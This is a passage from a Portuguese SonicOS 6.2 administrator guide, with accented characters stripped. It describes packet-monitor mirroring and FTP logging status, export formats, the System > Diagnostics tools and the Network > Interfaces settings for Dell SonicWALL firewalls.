transferncia de arquivos est lenta, por algum motivo. Se a transferncia no estiver
concluda no momento em que o buffer estiver cheio novamente, os dados no buffer
preenchido recentemente sero perdidos.
Nota Embora a opo de encapsulamento do buffer limpe o buffer aps o encapsulamento

automtico at o incio, isso no considerado perda de dados.
Status de espelhamento
Existem trs indicadores de status do espelhamento de pacotes:
Espelhamento local Pacotes enviados a outra interface fsica no mesmo SonicWALL

Para o espelhamento local, o indicador de status mostra uma das trs condies a seguir:
Vermelho O espelhamento est desativado
Verde O espelhamento est ativado
Amarelo O espelhamento est ativado, mas foi desativado porque a interface de
espelhamento local no foi especificada
A linha do espelhamento local tambm exibe as estatsticas a seguir:
Espelhamento para interface A interface de espelhamento local especificada
Pacotes espelhados O nmero total de pacotes espelhados localmente
Pacotes ignorados O nmero total de pacotes que ignoraram o espelhamento devido a
pacotes de entrada/sada na interface para a qual o monitoramento est configurado
Taxa de pacotes ultrapassados O nmero total de pacotes que ignoraram o
espelhamento devido ao limite da taxa
Transmisso do espelhamento remoto Pacotes enviados a um SonicWALL remoto

Para a Transmisso do espelhamento remoto, o indicador de status mostra uma das trs
condies a seguir:
Verde O espelhamento est ativado e um endereo IP do SonicWALL remoto est
configurado
Amarelo O espelhamento est ativado, mas foi desativado porque o dispositivo remoto
rejeita os pacotes espelhados e envia mensagens do ICMP de porta inacessvel

A linha Transmisso do espelhamento remoto tambm exibe as seguintes estatsticas:
Espelhamento para O endereo IP remoto especificado do SonicWALL
Pacotes espelhados O nmero total de pacotes espelhados para um dispositivo remoto
do SonicWALL
Pacotes ignorados O nmero total de pacotes que ignoraram o espelhamento devido a
pacotes de entrada/sada na interface para a qual o monitoramento est configurado
Taxa de pacotes ultrapassados O nmero total de pacotes que no foram capazes de
serem espelhados para um SonicWALL remoto, devido a uma porta inacessvel ou a outros
problemas de rede
Recepo do espelhamento remoto Pacotes recebidos de um SonicWALL remoto

Para a Recepo do espelhamento remoto, o indicador de status mostra uma das duas
condies a seguir:
Verde O espelhamento est ativado e um endereo IP do SonicWALL remoto est
configurado
A linha Recepo do espelhamento remoto tambm exibe as seguintes estatsticas:
Recepo de O endereo IP remoto especificado do SonicWALL
Espelhar pacotes recebidos O nmero total de pacotes recebidos de um dispositivo
remoto do SonicWALL
Espelhar pacotes recebidos, mas ignorados O nmero total de pacotes recebidos de um
dispositivo SonicWALL remoto que no foram capazes de serem espelhados localmente
devido a erros nos pacotes
Status de registro em log do FTP

O indicador de status de registro em log do FTP mostra uma das trs condies a seguir:
Vermelho O registro automtico em log do FTP est desativado
Verde O registro automtico em log do FTP est ativado
Amarelo Falha na ltima tentativa de contatar o servidor FTP e o registro em log est
desativado no momento
Para reiniciar o registro automtico em log do FTP, consulte Reiniciar o registro em log do
FTP na pgina 152.
Ao lado do indicador de registro em log do FTP, a interface de gerenciamento tambm exibe o
nmero de tentativas com falhas e com xito de transferir o contedo do buffer para o servidor
FTP, o estado atual do segmento do processo do FTP e o status do buffer de captura.
Abaixo do indicador de registro em log do FTP, na linha Estatsticas atuais do buffer, a interface
de gerenciamento exibe o nmero de pacotes descartados, encaminhados, consumidos,
gerados ou desconhecidos.
Na linha Configuraes atuais, possvel passar o mouse sobre Filtros, Geral ou Registro em
log para exibir o valor atualmente configurado para cada configurao nessa categoria. A
exibio de Filtros inclui as configuraes do filtro de captura e do filtro de exibio. A exibio
de Geral inclui as configuraes geral e avanada. A exibio de Registro em log mostra as
configuraes de registro em log do FTP.
Estatsticas atuais do buffer

A linha Estatsticas atuais do buffer resume o contedo atual do buffer de captura local. Ela
mostra o nmero de pacotes descartados, encaminhados, consumidos, gerados e
desconhecidos.

Configuraes atuais
A linha Configuraes atuais fornece exibies de informaes dinmicas para as
configuraes de filtro, geral, registro em log e espelhamento definidas. Ao passar o mouse
sobre um dos cones de informaes ou sobre seu rtulo, uma dica de ferramenta em pop-up
exibe as configuraes atuais para essa seleo.
Limpando as informaes de status

possvel limpar a fila do monitor de pacotes e as estatsticas exibidas do buffer de captura,
espelhamento e registro em log do FTP.

Etapa 2 Clique em Limpar.
Etapa 3 Clique em OK na caixa de dilogo de confirmao.
Informaes relacionadas
Tipos de pacotes suportados na pgina 159
Formatos de arquivo para Exportar como na pgina 159

Tipos de pacotes suportados
Ao especificar os tipos de pacote Ethernet ou IP que voc deseja monitorar ou exibir, possvel
usar o acrnimo padro para o tipo, se houver suporte, ou a representao hexadecimal
correspondente. Para determinar o valor hexadecimal de um protocolo, consulte a RFC para
obter o nmero atribudo a ele pela IANA. Os acrnimos dos protocolos que a SonicOS
atualmente suporta so os seguintes:
Tipos de Ethernet suportados: ARP

IP
PPPoE-DIS
PPPoE-SES
Para especificar PPPoE-DIS e PPPoE-SES, basta usar o
PPPoE.
Tipos de IP suportados: TCP
UDP
ICMP
IGMP
GRE
AH
ESP
Formatos de arquivo para Exportar como

A opo Exportar como da pgina Painel > Monitor de pacotes permite que voc exiba ou
salve um instantneo do buffer atual no formato de arquivo selecionado na lista suspensa. Os
arquivos salvos so colocados no sistema de gerenciamento local (onde a interface de
gerenciamento est sendo executada). Escolha um dos formatos a seguir:
Libpcap Selecione o formato Libpcap se deseja exibir os dados com o analisador de
protocolos de rede Wireshark. Ele tambm conhecido como formato libcap ou pcap. Uma
caixa de dilogo permite que voc abra o arquivo do buffer com o Wireshark ou salv-lo no
disco rgido local com a extenso .pcap.
HTML Selecione Html para exibir os dados com um navegador. possvel usar Arquivo > Salvar
como para salvar uma cpia do buffer no disco rgido.
Texto Selecione Texto para exibir os dados em um editor de texto. Uma caixa de dilogo
permite que voc abra o arquivo do buffer com o editor de texto registrado ou salv-lo no
disco rgido local com a extenso .wri.
Dados de aplicativos Selecione Dados de aplicativos para exibir apenas os dados de
aplicativo contidos no pacote. Os pacotes que no contm nenhum dado de aplicativo so
ignorados durante a captura. Dados de aplicativos = pacote capturado menos os
cabealhos L2, L3 e L4.
Alguns exemplos de formatos de Texto e HTML so mostrados nas sees a seguir:
Formato HTML na pgina 160
Formato do arquivo de texto na pgina 161

Formato HTML
possvel exibir o formato HTML em um navegador. Segue abaixo um exemplo que mostra o
cabealho e parte dos dados para o primeiro pacote no buffer.

Formato do arquivo de texto
possvel exibir a sada do formato de texto em um editor de texto. Segue abaixo um exemplo
que mostra o cabealho e parte dos dados para o primeiro pacote no buffer.

Captulo 11
Usando ferramentas de diagnstico
Esta seo contm informaes sobre as ferramentas de diagnstico fornecidas por SonicOS.
Consulte as sees a seguir para obter mais informaes:
Sistema > Diagnsticos na pgina 163
Sistema > Reiniciar na pgina 181
Sistema > Diagnsticos

A pgina Sistema > Diagnsticos fornece vrias ferramentas de diagnstico que ajudam a
solucionar problemas de rede, bem como de conexes ativas, CPU e monitores de processos.
Usando ferramentas de diagnstico | 163

Relatrio do suporte tcnico
O Relatrio do suporte tcnico gera um relatrio detalhado da configurao e do status do
dispositivo de segurana da Dell SonicWALL e o salva no disco rgido local usando o boto
Baixar relatrio. Este arquivo pode ser enviado por e-mail ao suporte tcnico da SonicWALL
para ajudar na assistncia ao seu problema.
Dica Deve-se registrar o dispositivo de segurana da SonicWALL em mysonicwall.com para

receber suporte tcnico.
Antes de enviar o e-mail do relatrio do suporte tcnico equipe de suporte tcnico da Dell SonicWALL,
preencha um formulrio de solicitao de suporte tcnico em https://www.mysonicwall.com. Aps o
envio do formulrio, um nmero exclusivo de ocorrncia ser retornado. Inclua esse nmero
de ocorrncia em todas as correspondncias, visto que ele permite que o suporte tcnico da
SonicWALL fornea um servio melhor.
Gerando um relatrio do suporte tcnico
Etapa 1 Na seo Relatrio do suporte tcnico, selecione qualquer uma das seguintes opes de
relatrio:
Chaves de VPN - salva segredos compartilhados, criptografias e chaves de autenticao
para o relatrio.
Cache de ARP - salva uma tabela que relaciona endereos IP ao MAC ou endereos
fsicos correspondentes.
Associaes DHCP - salva entradas do servidor DHCP do firewall.
Informaes IKE - salva informaes atuais sobre configuraes ativas de IKE.
Diagnsticos SonicPointN - salva as informaes de diagnstico sobre SonicPoints.
Usurios atuais - salva informaes atuais sobre conexes de usurio ativo.
Detalhe de usurios - salva informaes detalhadas sobre os usurios ativos.
Cache de Geo-IP/Botnets - salva as informaes armazenadas em cache atualmente de
Geo-IP e Botnet.

Detalhe de usurios - salva informaes atuais sobre detalhes da sesso do usurio
ativo. A caixa de seleo de relatrio de usurios atuais deve ser habilitada primeiro para
obter esse relatrio detalhado.
Etapa 2 Clique em Baixar relatrio para salvar o arquivo no sistema. Ao clicar em Baixar relatrio,
uma mensagem de aviso ser exibida.
Etapa 3 Clique em OK para salvar o arquivo. Anexe o relatrio ao e-mail de solicitao de suporte
tcnico.
Etapa 4 Para enviar a TSR, as preferncias do sistema e o log de rastreamento engenharia da
SonicWALL (no ao suporte tcnico da SonicWALL), clique em Enviar relatrios de
diagnstico. O indicador de Status na parte inferior da pgina exibir "Aguarde!" enquanto o
relatrio for enviado e, em seguida, exibir "Relatrios de diagnstico enviados com xito".
Geralmente, isso feito aps a comunicao com o suporte tcnico.
Etapa 5 Para enviar periodicamente a TSR, as preferncias do sistema e o log de rastreamento
MySonicWALL para a engenharia da SonicWALL, marque a caixa de seleo Habilitar backup
peridico de segurana de relatrios de diagnstico para MySonicwall e insira o intervalo
em minutos entre os relatrios peridicos no campo Intervalo de tempo (minutos).
Ferramentas de diagnstico
Selecione a ferramenta de diagnstico na lista suspensa Ferramenta de diagnstico na
seo Ferramenta de diagnstico da pgina Sistema > Diagnsticos. As seguintes
ferramentas de diagnstico esto disponveis:
Verificar configuraes de rede na pgina 166
Monitor de conexes na pgina 167
Monitor multi-core na pgina 169
Monitor central na pgina 170
Monitor de link na pgina 171
Monitor de tamanho de pacotes na pgina 172
Pesquisa de nome DNS na pgina 173
Encontrar caminho de rede na pgina 174
Ping na pgina 174
Monitor do processo do ncleo 0 na pgina 175
Pesquisa de lista negra em tempo real na pgina 176
Resoluo de nome reversa na pgina 176
Limite de conexo TopX na pgina 177
Pesquisa de MX e verificao de faixa na pgina 177
Rota de rastreamento na pgina 178
Monitor de servidor web na pgina 179
Monitor de usurios na pgina 180

Verificar configuraes de rede
Verificar configuraes de rede uma ferramenta de diagnstico que verificar
automaticamente o servio e a conectividade de rede de vrias reas funcionais predefinidas
do SonicOS, retornar os resultados e tentar descrever as causas, se as excees forem
detectadas. Essa ferramenta ajudar os administradores a localizar a rea do problema
quando os usurios encontrarem um problema de rede.
Especificamente, a ferramenta Verificar configuraes de rede testa automaticamente as

seguintes funes:
Configuraes de gateway padro
Configuraes de DNS
Conectividade com o servidor MySonicWALL
Conectividade com o servidor Gerenciador de licenas
Conectividade com o servidor Filtro de contedo
Os dados de retorno consistem em duas partes:
Resultados do teste fornece um resumo do resultado do teste
Notas fornecer detalhes para ajudar a determinar a causa, se houver quaisquer
problemas
A ferramenta Verificar configuraes de rede dependente do recurso Monitoramento de
rede disponvel na pgina Rede > Monitoramento de rede da interface de gerenciamento do
SonicOS. Sempre que a ferramenta Verificar configuraes de rede estiver sendo executada

(exceto durante o teste Filtro de contedo), uma poltica de monitoramento de rede
correspondente ser exibida na pgina de Monitoramento de rede, com um nome de poltica
de ferramenta de diagnstico especial no formato "diagTestPolicyAuto_<IP_address>_0".
Para usar a ferramenta Verificar configuraes de rede, primeiro selecione-a na lista suspensa
Ferramentas de diagnstico e clique no boto Testar na linha do item ao qual deseja testar.
Os resultados so exibidos na mesma linha. Uma marca de seleo verde significa um
teste bem-sucedido e um X vermelho indica que h um problema.
Para testar vrios itens ao mesmo tempo, marque a caixa de seleo de cada item desejado
e clique no boto Testar todos os selecionados.
Se houver quaisquer investigaes com falha, ser possvel clicar na seta azul esquerda
do campo Endereo IP do item com falha para ir para a pgina de configurao para investigar
a causa raiz.
Monitor de conexes
O Monitor de conexes exibe visualizaes exportveis, em tempo real (texto simples ou
CSV), que podem ser filtradas de todas as conexes para/e atravs do firewall.

Configuraes do monitor de conexes ativas
possvel filtrar os resultados para exibir apenas as conexes que correspondem a
determinados critrios. possvel filtrar por IP de origem, IP de destino, Porta de destino,
Protocolo, Interface de orig. e Interface de dest. Insira os critrios de filtro na tabela
Configuraes de monitor de conexes ativas. Clique em um ttulo de coluna para
classificar por essa coluna.
Os campos nos quais foram inseridos valores so combinados em uma cadeia de caracteres
de pesquisa com um E lgico. Por exemplo, se voc inserir valores para IP de origem e IP de
destino, a cadeia de caracteres de pesquisa procurar conexes que correspondam a:
IP de origem E IP de Destino
Marque a caixa Grupo prxima a qualquer um dos dois ou mais critrios para combin-los com
um OU lgico. Por exemplo, se voc inserir valores para IP de origem, IP de destino e
Protocolo e marcar Grupo prximo ao IP de origem e IP de destino, a cadeia de caracteres
de pesquisa procurar conexes que correspondam a:
(IP de origem OU IP de Destino) E Protocolo
Clique em Aplicar Filtro para aplicar o filtro imediatamente tabela Monitor de conexes
ativas. Clique em Reconfigurar filtros para limpar o filtro e exibir novamente os resultados
no filtrados.
possvel exportar a lista de conexes ativas para um arquivo. Clique em Exportar
Resultados e selecione se voc deseja que os resultados sejam exportados para um arquivo
de texto simples ou um arquivo CSV (valores separados por vrgula) para importao para uma
planilha, ferramenta de relatrio ou banco de dados. Se for solicitado a voc Abrir ou Salvar o
arquivo, selecione Salvar. Em seguida, insira um nome de arquivo e caminho e clique em OK.

Monitor multi-core
O Monitor Multi-Core exibe estatsticas atualizadas dinamicamente sobre a utilizao dos
ncleos individuais do dispositivo de segurana da Dell SonicWALL. O ncleo 1 at o ncleo
8 lida com o plano de controle. O uso do ncleo 1 at o ncleo 8 exibido em verde sobre o
Monitor Multi-Core. Os ncleos restantes manipulam o plano de dados. Para maximizar a
flexibilidade do processador, as funes no so dedicadas a ncleos especficos, em vez
disso, todos os ncleos podem processar todas as tarefas de plano de dados. A memria
compartilhada entre todos os ncleos. Cada ncleo pode processar um fluxo separado
simultaneamente, permitindo que at 88 fluxos sejam processados em paralelo.

Monitor central
O Monitor central exibe as estatsticas atualizadas dinamicamente sobre a utilizao de um
nico ncleo especificado nos dispositivos de segurana da Dell SonicWALL. A opo Ver
estilo oferece uma ampla variedade de intervalos de tempo que podem ser exibidos para
revisar o uso do ncleo.

Monitor de link
O Monitor de link exibe a utilizao de largura de banda para as interfaces no firewall. A
utilizao de largura de banda mostrada como uma porcentagem da capacidade total. O
Monitor de link pode ser configurado para exibir o trfego de entrada, o trfego de sada ou
ambos para cada uma das interfaces fsicas no dispositivo.

Monitor de tamanho de pacotes
O Monitor de tamanho de pacotes exibe os tamanhos de pacotes em interfaces no firewall.
possvel selecionar a partir de quatro perodos de tempo, que vo desde os ltimos 30
segundos aos ltimos 30 dias. O Monitor de tamanho de pacotes pode ser configurado para
exibir o trfego de entrada, o trfego de sada ou ambos para cada uma das interfaces fsicas
no dispositivo.
Etapa 1 Selecione uma das seguintes opes na lista suspensa Ver estilo:
ltimos 30 segundos
ltimos 30 minutos
ltimas 24 horas
ltimos 30 dias
Etapa 2 Selecione a interface fsica a ser visualizada na lista suspensa Nome de interface.
Etapa 3 Na lista suspensa Direo, selecione uma das seguintes opes:
Ambos Selecionar para pacotes que viajam na entrada e na sada
Entrada Selecionar para pacotes que chegam na interface
Sada Selecionar para pacotes que saem da interface
Os pacotes so exibidos no grfico de Tamanho mdio do pacote, em que o eixo X especifica
quando os pacotes cruzaram a interface e o eixo Y especifica o tamanho mdio de pacotes
nesse momento. Os pacotes de entrada so exibidos em verde e os pacotes de sada so
exibidos em vermelho.

Pesquisa de nome DNS
O dispositivo de segurana da Dell SonicWALL tem uma ferramenta de pesquisa DNS que
retorna o endereo IP de um nome de domnio. Se voc inserir um endereo IP, ele retornar
o nome de domnio para esse endereo.
Para resolver um nome de host ou um endereo IP:

Insira o nome de host ou endereo IP no campo Procurar nome.
No adicione http no nome de host.
O firewall consulta o servidor DNS e exibe o resultado na seo Resultado. Ele tambm exibe
o endereo IP do servidor DNS usado para executar a consulta.
A seo Pesquisa de nome DNS tambm exibe os endereos IP dos servidores DNS
configurados no firewall. Se no houver nenhum endereo IP ou endereos IP nos campos
Servidor DNS, deve-se configur-los na pgina Rede > Configuraes.
Pesquisa de nome DNS do IPv6

A ferramenta Pesquisa de nome DNS do IPv6 pesquisar o endereo IPv6 para um nome de
domnio. Como alternativa, se voc inserir um endereo IPv6, ele pesquisar o nome de
domnio para esse endereo.
Ao realizar a Pesquisa de DNS do IPv6 ou a Pesquisa de nome reverso do IPv6, digite o
endereo do servidor DNS. Pode ser usado um endereo IPv6 ou IPv4.
Para usar a ferramenta Pesquisa de nome DNS do IPv6, realize as seguintes etapas:
Etapa 1 Digite um endereo do servidor DNS no IPv4 no campo Servidor DNS (V4) ou um endereo
do servidor DNS no IPv6 no campo Servidor DNS (V6).
Etapa 2 No campo Pesquisa reversa do endereo IP, digite o nome de domnio do qual deseja saber
o endereo IPv6 ou o endereo IPv6 do qual deseja saber o nome de domnio.
Etapa 3 Clique em Ir.
O dispositivo retornar o par de correspondncia do endereo IPv6 e nome de domnio.

Encontrar caminho de rede
Insira um endereo IP para determinar que o caminho de rede, que est localizado em uma
interface de rede especfica, atingiu o endereo IP de gateway de um roteador, e atingiu por
meio de um endereo ethernet.
Ping
O teste Ping recupera um pacote desativado de uma mquina na Internet e o retorna ao
remetente. Esse teste mostra se o firewall capaz de entrar em contato com o host remoto.
Se os usurios na LAN estiverem tendo problemas ao acessar servios na Internet, tente
executar o ping do servidor DNS ou em outra mquina no local do ISP. Se o teste for
malsucedido, tente executar o ping de dispositivos fora do ISP. Se for possvel executar o ping
em dispositivos fora do ISP, em seguida, o problema estar com a conexo do ISP.
Etapa 1 Selecione Ping no menu Ferramenta de diagnstico.

Etapa 2 Insira o nome de host ou endereo IP do dispositivo de destino e clique em Ir.
Etapa 3 No menu suspenso Interface, selecione a partir de qual interface WAN deseja testar o ping.
Selecionar TODOS permite que o dispositivo escolha entre todas as interfaces incluindo
aquelas no listadas no menu suspenso.
Se o teste for bem-sucedido, o firewall retornar uma mensagem, informando que o endereo
IP est ativo e mostrando o tempo para retornar em milissegundos (ms).

Ping para IPv6
Para obter informaes completas sobre a implementao do IPv6 do SonicOS, consulte IPv6
na pgina 1443.
A ferramenta de ping inclui uma nova opo Preferir rede IPv6.
Ao executar ping em um domnio, usado o primeiro endereo IP que retornado e mostrado

o endereo de ping real. Se forem retornados um endereo IPv4 e um endereo IPv6, por
padro, o firewall executa ping no endereo IPv4.
Se a opo Preferir rede IPv6 estiver habilitada, o firewall executar o ping do endereo IPv6.
Monitor do processo do ncleo 0

O Monitor do processo do ncleo 0 mostra os processos de sistema individual no ncleo 0, sua
utilizao de CPU e sua hora do sistema. O monitor do processo do ncleo 0 est disponvel
nos dispositivos da srie SuperMassive 9000 multi-core e da srie NSA multi-core.

Pesquisa de lista negra em tempo real
A ferramenta Pesquisa de Lista negra em tempo real permite testar endereos IP de SMTP, servios
de RBL ou servidores DNS. Insira um endereo IP no campo Endereo IP, um FQDN para o RBL no
campo Domnio RBL e informaes do servidor DNS no campo Servidor DNS. Clique em Ir.
Resoluo de nome reversa

A ferramenta Resoluo de nome reversa semelhante ferramenta de pesquisa de nome
DNS, exceto se ela procurar um nome de servidor, determinado um endereo IP.
Insira um endereo IP no campo Pesquisa reversa de endereo IP e ela verificar todos os

servidores DNS configurados para o dispositivo de segurana para resolver o endereo IP em
um nome de servidor.
Resoluo de nome reverso do IPv6

na pgina 1443.
A ferramenta de Resoluo de nome reverso do IPv6 pesquisar o nome do servidor para um
determinado endereo IPv6. Para usar a ferramenta, realize as seguintes etapas:
Etapa 1 Digite um endereo do servidor DNS no IPv4 no campo Servidor DNS (V4) ou um endereo
do servidor DNS no IPv6 no campo Servidor DNS (V6).
Etapa 2 Digite o endereo IPv6 do qual deseja saber o nome do servidor no campo Pesquisa reversa
do endereo IP.
O dispositivo retornar o nome do servidor para o endereo IPv6.

Limite de conexo TopX
A ferramenta Limite de conexo TopX lista as 10 principais conexes pelos endereos IP de
origem e destino. Antes de poder usar essa ferramenta, deve-se habilitar a limitao de IP de
origem e/ou a limitao de IP de destino para o dispositivo. Se elas no estiverem habilitadas,
a pgina exibir uma mensagem para inform-lo de que possvel habilit-las na pgina
Firewall > Avanado.
Verificar a pesquisa de servidor de BOTNET e localizao

geogrfica
O recurso de filtragem de Botnet e Geo-IP permite aos administradores bloquear conexes
para/de um local geogrfico com base no endereo IP e para/de servidores de controle e
comando de Botnet. A funcionalidade adicional para esse recurso est disponvel na pgina
Servios de segurana > Filtro Geo-IP e Botnet. Para obter detalhes completos, Servios
de segurana > Filtro Geo-IP na pgina 1265 e
Pesquisa de MX e verificao de faixa

A ferramenta Pesquisa de MX e verificao de faixa permite procurar um domnio ou
endereo IP. Os Servidores DNS configurados so exibidos nos campos Servidor DNS 1/2/3,
mas no so editveis. Aps digitar um nome de domnio, como "google.com" no campo IP ou
nome de pesquisa e clicar em Ir, a sada ser exibida em Resultado. Os resultados incluem
o nome de domnio ou de endereo IP inserido, o servidor DNS da lista usada, o nome de

domnio do servidor de e-mail resolvido e/ou endereo IP e a faixa recebida do servidor de
domnio ou uma mensagem informando que a conexo foi recusada. O contedo da faixa
depende do servidor que voc est pesquisando.
Rota de rastreamento
Rota de rastreamento um utilitrio de diagnstico para ajudar a diagnosticar e solucionar
problemas de conexes de roteador na Internet. Usando os pacotes de ecos do Protocolo de
Mensagem de Conexo de Internet (ICMP) semelhantes aos pacotes de Ping, a Rota de
rastreamento poder testar a interconectividade com roteadores e outros hosts que esto
cada vez mais distante do caminho de rede at que a conexo falhe ou at que o host remoto
responda.
Etapa 1 Selecione Rota de rastreamento no menu Ferramenta de diagnstico.

Etapa 2 Digite o nome de domnio ou o endereo IP do host de destino no campo TraceRoute deste
host ou endereo IP.
Etapa 3 No menu suspenso Interface, selecione a partir de qual interface deseja testar a rota de
rastreamento. Selecionar TODOS permite que o dispositivo escolha entre todas as interfaces
incluindo aquelas no listadas no menu suspenso.
Uma segunda janela exibida com cada salto para o host de destino. Seguindo a rota,
possvel diagnosticar onde a conexo falha entre o firewall e o destino.

TraceRoute para IPv6
na pgina 1443.
A ferramenta TraceRoute inclui uma nova opo Preferir rede IPv6.
Ao testar a interconectividade com roteadores e outros hosts, ele usa o primeiro endereo IP
que retornado e mostra o endereo do TraceRoute real. Se um endereo IPv4 e IPv6 forem
retornados, por padro, o firewall executar o TraceRoute do endereo IPv4.
Se a opo Preferir rede IPv6estiver habilitada, o firewall executar o TraceRoute do
endereo IPv6.
Monitor de servidor web

A ferramenta Monitor de servidor web exibe a utilizao da CPU do servidor web em vrios
perodos de tempo. O intervalo de tempo do Monitor de servidor web pode ser alterado,
selecionando uma das opes a seguir no menu suspenso Ver estilo: ltimos 30 segundos,
ltimos 30 minutos, ltimas 24 horas ou ltimos 30 dias.

Monitor de usurios
A ferramenta Monitor de usurios exibe o nmeros de usurios registrados em vrios
perodos de tempo. O intervalo de tempo do Monitor de usurio pode ser alterado,
selecionando uma das opes a seguir no menu suspenso Ver estilo: ltimos 30 minutos,
ltimas 24 horas ou ltimos 30 dias.

Sistema > Reiniciar
O dispositivo de segurana da Dell SonicWALL pode ser reiniciado a partir da interface do
gerenciamento da web.
Etapa 1 V at a pgina Sistema > Reiniciar.

Etapa 2 Clique em Reiniciar.
O firewall leva cerca de 60 segundos para ser reiniciado.
Durante o tempo de reinicializao, o acesso Internet interrompido momentaneamente na

LAN.

Parte 4
Rede
| 183
184 | Guia do Administrador do SonicOS 6.2Guia do Administrador do SonicOS 6.2
Captulo 12
Configurar interfaces
Rede > Interfaces

A pgina Rede > Interfaces inclui objetos de interface que esto vinculados diretamente a
interfaces fsicas. O esquema do SonicOS de endereamento de interface funciona em
conjunto com zonas de rede e objetos de endereos.

Configuraes de interface na pgina 186
Configurar interfaces | 185

Estatsticas de trfego de interface na pgina 186
Interfaces fsicas e virtuais na pgina 187
Objetos seguros do SonicOS na pgina 189
Modo transparente na pgina 190
Modo de sniffer IPS na pgina 190
Configurar interfaces na pgina 193
Configurar o modo de sniffer IPS na pgina 210
Configurar o modo de cabo e de tap na pgina 214
Modo de cabo com agregao de links na pgina 217
Modo de ponte de camada 2 na pgina 219
Configurar modo de ponte de camada 2 na pgina 240
Configurando interfaces para o IPv6 na pgina 249
Configuraes de interface
A tabela Configuraes de interface lista as seguintes informaes para cada interface:
Nome o nome da interface.
Zona LAN, WAN, DMZ e WLAN esto listadas por padro. Como as zonas esto
configuradas, os nomes so listados nesta coluna.
Grupo se a interface estiver atribuda a um grupo de balanceamento de carga, ele ser
exibido nesta coluna.
Endereo IP endereo IP atribudo interface.
Mscara de sub-rede a mscara de rede atribuda sub-rede.
Atribuio de IP os mtodos de atribuio de IP disponveis dependem da zona qual
a interface est atribuda:
LAN: Esttico, Transparente, Modo de ponte de camada 2, Modo de cabo, Modo de tap
WAN: Esttico, DHCP, PPPoE, PPTP, L2TP, Modo de cabo, Modo de tap
DMZ: Esttico, Transparente, Modo de ponte de camada 2, Modo de cabo, Modo de tap
WLAN: Esttico, Modo de ponte de camada 2
Status o status do link e a velocidade.
Comentrio todos os comentrios definidos pelo usurio.
Configurar clique no cone Configurar para exibir a caixa de dilogo Editar
interface que permite que voc defina as configuraes para a interface especificada.
Estatsticas de trfego de interface

A tabela Estatsticas de trfego de interface lista informaes recebidas e transmitidas para
todas as interfaces configuradas.
As seguintes informaes so exibidas para cada interface:
Pacotes Unicast Rx indica o nmero de comunicaes ponto a ponto recebidas pela
interface.
Pacotes de difuso Rx indica o nmero de comunicaes multiponto recebidas pela
interface.
Bytes Rx indica o volume de dados, em bytes, recebidos pela interface.
Pacotes Unicast Tx indica o nmero de comunicaes ponto a ponto transmitidas pela
interface.

Bytes de difuso Tx indica o nmero de comunicaes multiponto recebidas pela
interface.
Bytes Tx indica o volume de dados, em bytes, transmitidos pela interface.
Para limpar as estatsticas atuais, clique no boto Limpar na parte superior direita da pgina
Rede > Interfaces.
Interfaces fsicas e virtuais

As interfaces no SonicOS podem ser:
Interfaces fsicas as interfaces fsicas esto associadas a uma nica porta
Interfaces virtuais as interfaces virtuais so atribudas como subinterfaces a uma
interface fsica e permitem que a interface fsica transporte o trfego atribudo a vrias
interfaces.
Interfaces fsicas
As interfaces fsicas devem ser atribudas a uma zona para permitir a configurao de Regras
de acesso para controlar o trfego de entrada e de sada. As zonas de segurana esto
associadas a cada interface fsica onde atuam como um canal para o trfego de entrada e de
sada. Se no houver nenhuma interface, o trfego no consegue acessar a zona ou sair dela.
Para obter mais informaes sobre zonas, consulte Rede > Zonas na pgina 263.
Portas de SFP+ de Ethernet de 10 Gigabits
Nos dispositivos da srie SuperMassive 9000, as portas de fator de forma pequeno avanado
plugvel (SFP+), X16, X18 e X19 so designadas com um ponto para indicar que possuem
uma velocidade de processamento mxima direta para a CPU. Estas portas com pontos tm
um uplink dedicado (no compartilhado) para a CPU.
Isso benfico se voc tiver um backbone de rede corporativa de 10 Gb, e se estiver usando
um SuperMassive 9200 para o dispositivo de gateway de seu departamento. Voc deve
conectar uma das portas com pontos (X16, X18 ou X19) diretamente ao backbone. O motivo
que essas portas so conexes diretas da CPU ao que voc conectar a elas. Voc no deseja
que essas portas compartilhem largura de banda com usurios ou quaisquer outros
dispositivos na sua rede. Para obter mxima velocidade e eficincia, essas portas devem ser
conectadas diretamente ao backbone.
Normalmente, links essenciais para os negcios e muito multiplexados devem estar
conectados a uma interface pontilhada. Um exemplo de um caso de uso essencial para o
negcio pode envolver uma unidade administrativa conectada a uma rede backbone de 10 Gb.
Para desempenho mximo, a conexo backbone upstream deve se conectar atravs de uma
interface pontilhada. Isso garante que o trfego de backbone importante nunca seja perdido
devido a condies transitrias de alta carga nas outras interfaces no pontilhadas que
compartilham um uplink da CPU.
Um exemplo de um caso de uso muito multiplexado pode envolver vrios switches corporativos
downstream com uplinks de 10 Gb cada um. Para desempenho mximo, cada um deve ser
conectado atravs de uma interface pontilhada. Isso garante que diferentes domnios de
comutao de alto nvel no consigam esgotar recursos da CPU entre si.

Interfaces virtuais (VLAN)
Suportadas em dispositivos de segurana SonicWALL, as interfaces virtuais so subinterfaces
atribudas a uma interface fsica. As interfaces virtuais permitem que voc tenha mais de uma
interface em uma conexo fsica.
As interfaces virtuais fornecem muitos dos mesmos recursos das interfaces fsicas, incluindo
atribuio de zonas, servidor DHCP e controles de NAT e regras de acesso.
As redes locais virtuais (VLANs) podem ser descritas como uma "tecnologia de multiplexao
de LAN baseada em marca", uma vez que, atravs do uso de marcaes de cabealho IP, as
VLANs podem simular vrias LANs em uma nica LAN fsica. Tal como duas LANs
desconectadas e fisicamente distintas esto totalmente separadas uma da outra, o mesmo
acontece com duas VLANs diferentes, embora as duas VLANs possam existir na mesma rede.
As VLANs exigem dispositivos de rede que reconhecem VLAN para oferecer esse tipo de
virtualizao switches, roteadores e firewalls que tm a capacidade de reconhecer,
processar, remover e inserir marcas VLAN em conformidade com as polticas de segurana e
design da rede.
As VLANs so teis por diferentes motivos, estando a maioria desses motivos ligada
capacidade das VLANs de fornecer um domnio de difuso lgica em vez de fsica ou limites
de LAN. Isso funciona na segmentao de LANs fsicas maiores em LANs virtuais menores,
bem como na unio de LANs fisicamente distintas em uma LAN virtual contgua lgica. Os
benefcios disso incluem:
Aumento do desempenho a criao de domnios de difuso menores e particionados de
forma lgica diminui a utilizao geral da rede, enviando difuses somente para onde
precisam ser enviadas, deixando assim mais largura de banda disponvel para trfego de
aplicativos.
Custos menores historicamente, a segmentao da difuso era executada com
roteadores, exigindo hardware e configurao adicionais. Com VLANs, o papel funcional
do roteador revertido. Em vez de ser usado para inibir comunicaes, ele usado para
facilitar comunicaes entre VLANs separadas, conforme necessrio.

Grupos de trabalho virtuais os grupos de trabalho so unidades lgicas que normalmente
compartilham informaes, como um departamento de Marketing ou um departamento de
